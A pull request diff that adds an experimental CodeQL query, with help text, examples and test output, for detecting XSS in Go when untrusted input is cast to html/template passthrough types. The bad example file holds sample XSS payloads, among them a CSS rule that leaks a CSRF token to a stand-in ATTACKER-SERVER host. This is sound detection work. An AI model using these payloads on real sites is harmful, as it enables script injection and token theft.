### PR TITLE
Add CWE-79: HTML template escaping passthrough

### DIFF
--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
@@ -1,0 +1,28 @@
+<!DOCTYPE qhelp PUBLIC "-//Semmle//qhelp//EN" "qhelp.dtd">
+<qhelp>
+	<overview>
+		<p>
+			In Go, the <code>html/template</code> package has a few special types
+			(<code>HTML</code>, <code>HTMLAttr</code>, <code>JS</code>, <code>JSStr</code>, <code>CSS</code>,
+			<code>Srcset</code>, <code>URL</code>)
+			that allow values to be rendered as-is in the template, avoiding the escaping that all the other strings go
+			through.
+		</p>
+		<p>Using them on user-provided values will result in an XSS.</p>
+	</overview>
+	<recommendation>
+		<p>
+			Make sure to never use those types on untrusted content.
+		</p>
+	</recommendation>
+	<example>
+		<p>
+			In the first example you can see the special types and how they are used in a template:
+		</p>
+		<sample src="HTMLTemplateEscapingPassthroughBad.go" />
+		<p>
+			To avoid XSS, all user input should be a normal string type.
+		</p>
+		<sample src="HTMLTemplateEscapingPassthroughGood.go" />
+	</example>
+</qhelp>

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
@@ -8,7 +8,7 @@
 			that allow values to be rendered as-is in the template, avoiding the escaping that all the other strings go
 			through.
 		</p>
-		<p>Using them on user-provided values will result in an XSS.</p>
+		<p>Using them on user-provided values will result in an opportunity for XSS.</p>
 	</overview>
 	<recommendation>
 		<p>

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qhelp
@@ -4,7 +4,7 @@
 		<p>
 			In Go, the <code>html/template</code> package has a few special types
 			(<code>HTML</code>, <code>HTMLAttr</code>, <code>JS</code>, <code>JSStr</code>, <code>CSS</code>,
-			<code>Srcset</code>, <code>URL</code>)
+			<code>Srcset</code>, and <code>URL</code>)
 			that allow values to be rendered as-is in the template, avoiding the escaping that all the other strings go
 			through.
 		</p>

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -42,10 +42,9 @@ class PassthroughTypeName extends string {
  * output of the templates.
  */
 class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Configuration {
-  string dstTypeName;
+  PassthroughTypeName dstTypeName;
 
   FlowConfFromUntrustedToPassthroughTypeConversion() {
-    dstTypeName instanceof PassthroughTypeName and
     this = "UntrustedToConversion" + dstTypeName
   }
 
@@ -105,11 +104,10 @@ class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTrac
     isSourceConversionToPassthroughType(source, _)
   }
 
-  private predicate isSourceConversionToPassthroughType(DataFlow::TypeCastNode source, string name) {
+  private predicate isSourceConversionToPassthroughType(DataFlow::TypeCastNode source, PassthroughTypeName name) {
     exists(Type typ |
       typ = source.getResultType() and
-      typ.getUnderlyingType*().hasQualifiedName("html/template", name) and
-      name instanceof PassthroughTypeName
+      typ.getUnderlyingType*().hasQualifiedName("html/template", name)
     )
   }
 

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -49,11 +49,14 @@ class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Co
     this = "UntrustedToConversion" + dstTypeName
   }
 
+  /**
+   * Gets the name of conversion's destination type.
+   */
   string getDstTypeName() { result = dstTypeName }
 
   override predicate isSource(DataFlow::Node source) { source instanceof UntrustedFlowSource }
 
-  predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, string name) {
+  private predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, string name) {
     exists(Type typ |
       typ = sink.getResultType() and
       typ.getUnderlyingType*().hasQualifiedName("html/template", name) and
@@ -90,16 +93,19 @@ class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTrac
 
   FlowConfPassthroughTypeConversionToTemplateExecutionCall() {
     dstTypeName instanceof PassthroughTypeName and
-    this = "UnsafeConversionToExec" + dstTypeName
+    this = "ConversionToExec" + dstTypeName
   }
 
+  /**
+   * Gets the name of conversion's destination type.
+   */
   string getDstTypeName() { result = dstTypeName }
 
   override predicate isSource(DataFlow::Node source) {
     isSourceConversionToPassthroughType(source, _)
   }
 
-  predicate isSourceConversionToPassthroughType(DataFlow::TypeCastNode source, string name) {
+  private predicate isSourceConversionToPassthroughType(DataFlow::TypeCastNode source, string name) {
     exists(Type typ |
       typ = source.getResultType() and
       typ.getUnderlyingType*().hasQualifiedName("html/template", name) and

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -142,6 +142,10 @@ class FlowConfFromUntrustedToTemplateExecutionCall extends TaintTracking::Config
   override predicate isSource(DataFlow::Node source) { source instanceof UntrustedFlowSource }
 
   override predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
+
+  override predicate isSanitizer(DataFlow::Node sanitizer) {
+    sanitizer instanceof SharedXss::Sanitizer
+  }
 }
 
 /**

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -18,9 +18,9 @@ import DataFlow::PathGraph
  * and `conversionSink` gets populated with the node where the conversion happens.
  */
 predicate flowsFromUntrustedToConversion(
-  DataFlow::PathNode untrusted, string targetType, DataFlow2::PathNode conversionSink
+  DataFlow::PathNode untrusted, string targetType, DataFlow::PathNode conversionSink
 ) {
-  exists(FlowConfFromUntrustedToPassthroughTypeConversion cfg, DataFlow2::PathNode source |
+  exists(FlowConfFromUntrustedToPassthroughTypeConversion cfg, DataFlow::PathNode source |
     cfg.hasFlowPath(source, conversionSink) and
     source.getNode() = untrusted.getNode() and
     targetType = cfg.getDstTypeName()
@@ -41,7 +41,7 @@ class PassthroughTypeName extends string {
  * this allows the injection of arbitrary content (html, css, js) into the generated
  * output of the templates.
  */
-class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking2::Configuration {
+class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Configuration {
   string dstTypeName;
 
   FlowConfFromUntrustedToPassthroughTypeConversion() {
@@ -68,11 +68,11 @@ class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking2::C
  * Holds if the provided `conversion` node flows into the provided `execSink`.
  */
 predicate flowsFromConversionToExec(
-  DataFlow2::PathNode conversion, string targetType, DataFlow::PathNode execSink
+  DataFlow::PathNode conversion, string targetType, DataFlow::PathNode execSink
 ) {
   exists(
-    FlowConfPassthroughTypeConversionToTemplateExecutionCall cfg, DataFlow2::PathNode source,
-    DataFlow2::PathNode execSinkLocal
+    FlowConfPassthroughTypeConversionToTemplateExecutionCall cfg, DataFlow::PathNode source,
+    DataFlow::PathNode execSinkLocal
   |
     cfg.hasFlowPath(source, execSinkLocal) and
     source.getNode() = conversion.getNode() and
@@ -85,7 +85,7 @@ predicate flowsFromConversionToExec(
  * A taint-tracking configuration for reasoning about when the result of a conversion
  * to a PassthroughType flows to a template execution call.
  */
-class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTracking2::Configuration {
+class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTracking::Configuration {
   string dstTypeName;
 
   FlowConfPassthroughTypeConversionToTemplateExecutionCall() {
@@ -147,7 +147,7 @@ predicate flowsFromUntrustedToExec(DataFlow::PathNode untrusted, DataFlow::PathN
 
 from
   DataFlow::PathNode untrustedSource, DataFlow::PathNode templateExecCall, string targetTypeName,
-  DataFlow2::PathNode conversion
+  DataFlow::PathNode conversion
 where
   // A = untrusted remote flow source
   // B = conversion to PassthroughType

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -18,7 +18,7 @@ import DataFlow::PathGraph
  * and `conversionSink` gets populated with the node where the conversion happens.
  */
 predicate flowsFromUntrustedToConversion(
-  DataFlow::Node untrusted, string targetType, DataFlow::Node conversionSink
+  DataFlow::Node untrusted, PassthroughTypeName targetType, DataFlow::Node conversionSink
 ) {
   exists(FlowConfFromUntrustedToPassthroughTypeConversion cfg, DataFlow::Node source |
     cfg.hasFlow(source, conversionSink) and
@@ -51,15 +51,14 @@ class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Co
   /**
    * Gets the name of conversion's destination type.
    */
-  string getDstTypeName() { result = dstTypeName }
+  PassthroughTypeName getDstTypeName() { result = dstTypeName }
 
   override predicate isSource(DataFlow::Node source) { source instanceof UntrustedFlowSource }
 
-  private predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, string name) {
+  private predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, PassthroughTypeName name) {
     exists(Type typ |
       typ = sink.getResultType() and
-      typ.getUnderlyingType*().hasQualifiedName("html/template", name) and
-      name instanceof PassthroughTypeName
+      typ.getUnderlyingType*().hasQualifiedName("html/template", name)
     )
   }
 
@@ -70,7 +69,7 @@ class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Co
  * Holds if the provided `conversion` node flows into the provided `execSink`.
  */
 predicate flowsFromConversionToExec(
-  DataFlow::Node conversion, string targetType, DataFlow::Node execSink
+  DataFlow::Node conversion, PassthroughTypeName targetType, DataFlow::Node execSink
 ) {
   exists(
     FlowConfPassthroughTypeConversionToTemplateExecutionCall cfg, DataFlow::Node source,
@@ -88,17 +87,16 @@ predicate flowsFromConversionToExec(
  * to a PassthroughType flows to a template execution call.
  */
 class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTracking::Configuration {
-  string dstTypeName;
+  PassthroughTypeName dstTypeName;
 
   FlowConfPassthroughTypeConversionToTemplateExecutionCall() {
-    dstTypeName instanceof PassthroughTypeName and
     this = "ConversionToExec" + dstTypeName
   }
 
   /**
    * Gets the name of conversion's destination type.
    */
-  string getDstTypeName() { result = dstTypeName }
+  PassthroughTypeName getDstTypeName() { result = dstTypeName }
 
   override predicate isSource(DataFlow::Node source) {
     isSourceConversionToPassthroughType(source, _)
@@ -156,8 +154,8 @@ predicate flowsFromUntrustedToExec(DataFlow::PathNode untrusted, DataFlow::PathN
 }
 
 from
-  DataFlow::PathNode untrustedSource, DataFlow::PathNode templateExecCall, string targetTypeName,
-  DataFlow::PathNode conversion
+  DataFlow::PathNode untrustedSource, DataFlow::PathNode templateExecCall,
+  PassthroughTypeName targetTypeName, DataFlow::PathNode conversion
 where
   // A = untrusted remote flow source
   // B = conversion to PassthroughType

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -138,15 +138,6 @@ class FlowConfFromUntrustedToTemplateExecutionCall extends TaintTracking::Config
   override predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
 }
 
-private class DummySource extends UntrustedFlowSource::Range {
-  DummySource() {
-    exists(Function fn, DataFlow::CallNode call | fn.hasQualifiedName(_, "source") |
-      call = fn.getACall() and
-      this = call.getResult()
-    )
-  }
-}
-
 /**
  * Holds if the provided `conversion` node flows into the provided `execSink`.
  */

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -12,15 +12,6 @@
 import go
 import DataFlow::PathGraph
 
-private class DummySource extends UntrustedFlowSource::Range {
-  DummySource() {
-    exists(Function fn, DataFlow::CallNode call | fn.hasQualifiedName(_, "source") |
-      call = fn.getACall() and
-      this = call.getResult()
-    )
-  }
-}
-
 /**
  * Holds if the provided src node flows into a conversion to a PassthroughType.
  */

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -91,11 +91,11 @@ class TemplateExecutionFlowConf extends TaintTracking::Configuration {
 }
 
 from
-  TemplateExecutionFlowConf cfg, DataFlow::PathNode source, DataFlow::PathNode sink,
-  string targetTypeName, DataFlow::PathNode conversionSink
+  TemplateExecutionFlowConf cfg, DataFlow::PathNode untrustedSource,
+  DataFlow::PathNode tplExecutionSink, string targetTypeName, DataFlow::PathNode conversionSink
 where
-  cfg.hasFlowPath(source, sink) and
-  isConvertedToPassthroughType(source.getNode(), targetTypeName, conversionSink)
-select sink.getNode(), source, sink,
+  cfg.hasFlowPath(untrustedSource, tplExecutionSink) and
+  isConvertedToPassthroughType(untrustedSource.getNode(), targetTypeName, conversionSink)
+select tplExecutionSink.getNode(), untrustedSource, tplExecutionSink,
   "Data from an $@ will not be auto-escaped because it was $@ to template." + targetTypeName,
-  source.getNode(), "untrusted source", conversionSink.getNode(), "converted"
+  untrustedSource.getNode(), "untrusted source", conversionSink.getNode(), "converted"

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -18,9 +18,9 @@ import DataFlow::PathGraph
  * and `conversionSink` gets populated with the node where the conversion happens.
  */
 predicate flowsFromUntrustedToConversion(
-  DataFlow::PathNode untrusted, string targetType, DataFlow::PathNode conversionSink
+  DataFlow::PathNode untrusted, string targetType, DataFlow2::PathNode conversionSink
 ) {
-  exists(FlowConfFromUntrustedToPassthroughTypeConversion cfg, DataFlow::PathNode source |
+  exists(FlowConfFromUntrustedToPassthroughTypeConversion cfg, DataFlow2::PathNode source |
     cfg.hasFlowPath(source, conversionSink) and
     source.getNode() = untrusted.getNode() and
     targetType = cfg.getDstTypeName()
@@ -41,7 +41,7 @@ class PassthroughTypeName extends string {
  * this allows the injection of arbitrary content (html, css, js) into the generated
  * output of the templates.
  */
-class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Configuration {
+class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking2::Configuration {
   string dstTypeName;
 
   FlowConfFromUntrustedToPassthroughTypeConversion() {
@@ -68,11 +68,11 @@ class FlowConfFromUntrustedToPassthroughTypeConversion extends TaintTracking::Co
  * Holds if the provided `conversion` node flows into the provided `execSink`.
  */
 predicate flowsFromConversionToExec(
-  DataFlow::PathNode conversion, string targetType, DataFlow::PathNode execSink
+  DataFlow2::PathNode conversion, string targetType, DataFlow::PathNode execSink
 ) {
   exists(
-    FlowConfPassthroughTypeConversionToTemplateExecutionCall cfg, DataFlow::PathNode source,
-    DataFlow::PathNode execSinkLocal
+    FlowConfPassthroughTypeConversionToTemplateExecutionCall cfg, DataFlow2::PathNode source,
+    DataFlow2::PathNode execSinkLocal
   |
     cfg.hasFlowPath(source, execSinkLocal) and
     source.getNode() = conversion.getNode() and
@@ -85,7 +85,7 @@ predicate flowsFromConversionToExec(
  * A taint-tracking configuration for reasoning about when the result of a conversion
  * to a PassthroughType flows to a template execution call.
  */
-class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTracking::Configuration {
+class FlowConfPassthroughTypeConversionToTemplateExecutionCall extends TaintTracking2::Configuration {
   string dstTypeName;
 
   FlowConfPassthroughTypeConversionToTemplateExecutionCall() {
@@ -147,7 +147,7 @@ predicate flowsFromUntrustedToExec(DataFlow::PathNode untrusted, DataFlow::PathN
 
 from
   DataFlow::PathNode untrustedSource, DataFlow::PathNode templateExecCall, string targetTypeName,
-  DataFlow::PathNode conversion
+  DataFlow2::PathNode conversion
 where
   // A = untrusted remote flow source
   // B = conversion to PassthroughType

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -146,19 +146,19 @@ predicate flowsFromUntrustedToExec(DataFlow::PathNode untrusted, DataFlow::PathN
 }
 
 from
-  DataFlow::PathNode untrustedSource, DataFlow::PathNode tplExecCall, string targetTypeName,
-  DataFlow::PathNode conversionSink
+  DataFlow::PathNode untrustedSource, DataFlow::PathNode templateExecCall, string targetTypeName,
+  DataFlow::PathNode conversion
 where
-  // A = remoteflowsource
+  // A = untrusted remote flow source
   // B = conversion to PassthroughType
-  // C = template execution
+  // C = template execution call
   // Flows:
   // A -> B
-  flowsFromUntrustedToConversion(untrustedSource, targetTypeName, conversionSink) and
+  flowsFromUntrustedToConversion(untrustedSource, targetTypeName, conversion) and
   // B -> C
-  flowsFromConversionToExec(conversionSink, targetTypeName, tplExecCall) and
+  flowsFromConversionToExec(conversion, targetTypeName, templateExecCall) and
   // A -> C
-  flowsFromUntrustedToExec(untrustedSource, tplExecCall)
-select tplExecCall.getNode(), untrustedSource, tplExecCall,
+  flowsFromUntrustedToExec(untrustedSource, templateExecCall)
+select templateExecCall.getNode(), untrustedSource, templateExecCall,
   "Data from an $@ will not be auto-escaped because it was $@ to template." + targetTypeName,
-  untrustedSource.getNode(), "untrusted source", conversionSink.getNode(), "converted"
+  untrustedSource.getNode(), "untrusted source", conversion.getNode(), "converted"

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -1,0 +1,108 @@
+/**
+ * @name HTML template escaping passthrough
+ * @description If a user-provided value is converted to a special type that avoids escaping when fed into a HTML
+ *              template, it may result in XSS.
+ * @kind path-problem
+ * @problem.severity warning
+ * @id go/html-template-escaping-passthrough
+ * @tags security
+ *       external/cwe/cwe-79
+ */
+
+import go
+import DataFlow::PathGraph
+
+private class DummySource extends UntrustedFlowSource::Range {
+  DummySource() {
+    exists(Function fn, DataFlow::CallNode call | fn.hasQualifiedName(_, "source") |
+      call = fn.getACall() and
+      this = call.getResult()
+    )
+  }
+}
+
+/**
+ * Holds if the provided src node flows into a conversion to a PassthroughType.
+ */
+predicate isConvertedToPassthroughType(
+  DataFlow::Node src, string targetType, DataFlow::PathNode conversionSink
+) {
+  exists(ConversionFlowToPassthroughTypeConf cfg, DataFlow::PathNode source |
+    cfg.hasFlowPath(source, conversionSink) and
+    source.getNode() = src and
+    targetType = cfg.getDstTypeName()
+  )
+}
+
+/**
+ * Gets the names of the types that will not be escaped when passed to
+ * a `html/template` template.
+ */
+string getAPassthroughTypeName() {
+  result = ["HTML", "HTMLAttr", "JS", "JSStr", "CSS", "Srcset", "URL"]
+}
+
+/**
+ * A taint-tracking configuration for reasoning about when an UntrustedFlowSource
+ * is converted into a special type which will not be escaped by the template generator;
+ * this allows the injection of arbitrary content (html, css, js) into the generated
+ * output of the templates.
+ */
+class ConversionFlowToPassthroughTypeConf extends TaintTracking::Configuration {
+  string dstTypeName;
+
+  ConversionFlowToPassthroughTypeConf() {
+    dstTypeName = getAPassthroughTypeName() and
+    this = "UnsafeConversion" + dstTypeName
+  }
+
+  string getDstTypeName() { result = dstTypeName }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof UntrustedFlowSource }
+
+  predicate isSinkToPassthroughType(DataFlow::TypeCastNode sink, string name) {
+    exists(Type typ |
+      typ = sink.getResultType() and
+      typ.getUnderlyingType*().hasQualifiedName("html/template", name) and
+      name = getAPassthroughTypeName()
+    )
+  }
+
+  override predicate isSink(DataFlow::Node sink) { isSinkToPassthroughType(sink, dstTypeName) }
+}
+
+/**
+ * Holds if the the sink is a data value argument of a template execution call.
+ */
+predicate isSinkToTemplateExec(DataFlow::Node sink, DataFlow::CallNode call) {
+  exists(Method fn, string methodName |
+    fn.hasQualifiedName("html/template", "Template", methodName) and
+    call = fn.getACall()
+  |
+    methodName = "Execute" and sink = call.getArgument(1)
+    or
+    methodName = "ExecuteTemplate" and sink = call.getArgument(2)
+  )
+}
+
+/**
+ * A taint-tracking configuration for reasoning about when an UntrustedFlowSource
+ * flows into a template executor call.
+ */
+class TemplateExecutionFlowConf extends TaintTracking::Configuration {
+  TemplateExecutionFlowConf() { this = "TemplateExecutionFlowConf" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof UntrustedFlowSource }
+
+  override predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
+}
+
+from
+  TemplateExecutionFlowConf cfg, DataFlow::PathNode source, DataFlow::PathNode sink,
+  string targetTypeName, DataFlow::PathNode conversionSink
+where
+  cfg.hasFlowPath(source, sink) and
+  isConvertedToPassthroughType(source.getNode(), targetTypeName, conversionSink)
+select sink.getNode(), source, sink,
+  "Data from an $@ will not be auto-escaped because it was $@ to template." + targetTypeName,
+  source.getNode(), "untrusted source", conversionSink.getNode(), "converted"

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -144,7 +144,7 @@ class FlowConfFromUntrustedToTemplateExecutionCall extends TaintTracking::Config
   override predicate isSink(DataFlow::Node sink) { isSinkToTemplateExec(sink, _) }
 
   override predicate isSanitizer(DataFlow::Node sanitizer) {
-    sanitizer instanceof SharedXss::Sanitizer
+    sanitizer instanceof SharedXss::Sanitizer or sanitizer.getType() instanceof NumericType
   }
 }
 

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
@@ -14,6 +14,8 @@ import DataFlow::PathGraph
 
 /**
  * Holds if the provided src node flows into a conversion to a PassthroughType.
+ * The `targetType` parameter gets populated with the name of the PassthroughType,
+ * and `conversionSink` with the node where the conversion happens.
  */
 predicate isConvertedToPassthroughType(
   DataFlow::Node src, string targetType, DataFlow::PathNode conversionSink
@@ -26,11 +28,11 @@ predicate isConvertedToPassthroughType(
 }
 
 /**
- * Gets the names of the types that will not be escaped when passed to
+ * Provides the names of the types that will not be escaped when passed to
  * a `html/template` template.
  */
-string getAPassthroughTypeName() {
-  result = ["HTML", "HTMLAttr", "JS", "JSStr", "CSS", "Srcset", "URL"]
+class PassthroughTypeName extends string {
+  PassthroughTypeName() { this = ["HTML", "HTMLAttr", "JS", "JSStr", "CSS", "Srcset", "URL"] }
 }
 
 /**
@@ -43,7 +45,7 @@ class ConversionFlowToPassthroughTypeConf extends TaintTracking::Configuration {
   string dstTypeName;
 
   ConversionFlowToPassthroughTypeConf() {
-    dstTypeName = getAPassthroughTypeName() and
+    dstTypeName instanceof PassthroughTypeName and
     this = "UnsafeConversion" + dstTypeName
   }
 
@@ -55,7 +57,7 @@ class ConversionFlowToPassthroughTypeConf extends TaintTracking::Configuration {
     exists(Type typ |
       typ = sink.getResultType() and
       typ.getUnderlyingType*().hasQualifiedName("html/template", name) and
-      name = getAPassthroughTypeName()
+      name instanceof PassthroughTypeName
     )
   }
 
@@ -63,7 +65,7 @@ class ConversionFlowToPassthroughTypeConf extends TaintTracking::Configuration {
 }
 
 /**
- * Holds if the the sink is a data value argument of a template execution call.
+ * Holds if the sink is a data value argument of a template execution call.
  */
 predicate isSinkToTemplateExec(DataFlow::Node sink, DataFlow::CallNode call) {
   exists(Method fn, string methodName |

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughBad.go
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughBad.go
@@ -1,0 +1,70 @@
+package main
+
+import (
+	"html/template"
+	"os"
+)
+
+func main() {}
+func source(s string) string {
+	return s
+}
+
+type HTMLAlias = template.HTML
+
+func checkError(err error) {
+	if err != nil {
+		panic(err)
+	}
+}
+
+// bad is an example of a bad implementation
+func bad() {
+	tmpl, _ := template.New("test").Parse(`Hi {{.}}\n`)
+	tmplTag, _ := template.New("test").Parse(`Hi <b {{.}}></b>\n`)
+	tmplScript, _ := template.New("test").Parse(`<script> eval({{.}}) </script>`)
+	tmplSrcset, _ := template.New("test").Parse(`<img srcset="{{.}}"/>`)
+
+	{
+		{
+			var a = template.HTML(source(`<a href='example.com'>link</a>`))
+			checkError(tmpl.Execute(os.Stdout, a))
+		}
+		{
+			{
+				var a template.HTML
+				a = template.HTML(source(`<a href='example.com'>link</a>`))
+				checkError(tmpl.Execute(os.Stdout, a))
+			}
+			{
+				var a HTMLAlias
+				a = HTMLAlias(source(`<a href='example.com'>link</a>`))
+				checkError(tmpl.Execute(os.Stdout, a))
+			}
+		}
+	}
+	{
+		var c = template.HTMLAttr(source(`href="https://example.com"`))
+		checkError(tmplTag.Execute(os.Stdout, c))
+	}
+	{
+		var d = template.JS(source("alert({hello: 'world'})"))
+		checkError(tmplScript.Execute(os.Stdout, d))
+	}
+	{
+		var e = template.JSStr(source("setTimeout('alert()')"))
+		checkError(tmplScript.Execute(os.Stdout, e))
+	}
+	{
+		var b = template.CSS(source("input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } "))
+		checkError(tmpl.Execute(os.Stdout, b))
+	}
+	{
+		var f = template.Srcset(source(`evil.jpg 320w`))
+		checkError(tmplSrcset.Execute(os.Stdout, f))
+	}
+	{
+		var g = template.URL(source("javascript:alert(1)"))
+		checkError(tmpl.Execute(os.Stdout, g))
+	}
+}

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughGood.go
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughGood.go
@@ -1,0 +1,15 @@
+package main
+
+import (
+	"html/template"
+	"os"
+)
+
+// good is an example of a good implementation
+func good() {
+	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
+	{ // This will be escaped:
+		var caught = source(`<a href="example.com">link</a>`)
+		checkError(tmpl.Execute(os.Stdout, caught))
+	}
+}

--- a/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughGood.go
+++ b/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthroughGood.go
@@ -9,7 +9,7 @@ import (
 func good() {
 	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
 	{ // This will be escaped:
-		var caught = source(`<a href="example.com">link</a>`)
-		checkError(tmpl.Execute(os.Stdout, caught))
+		var escaped = source(`<a href="example.com">link</a>`)
+		checkError(tmpl.Execute(os.Stdout, escaped))
 	}
 }

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -1,274 +1,55 @@
 edges
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
-| HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
-| HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
-| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
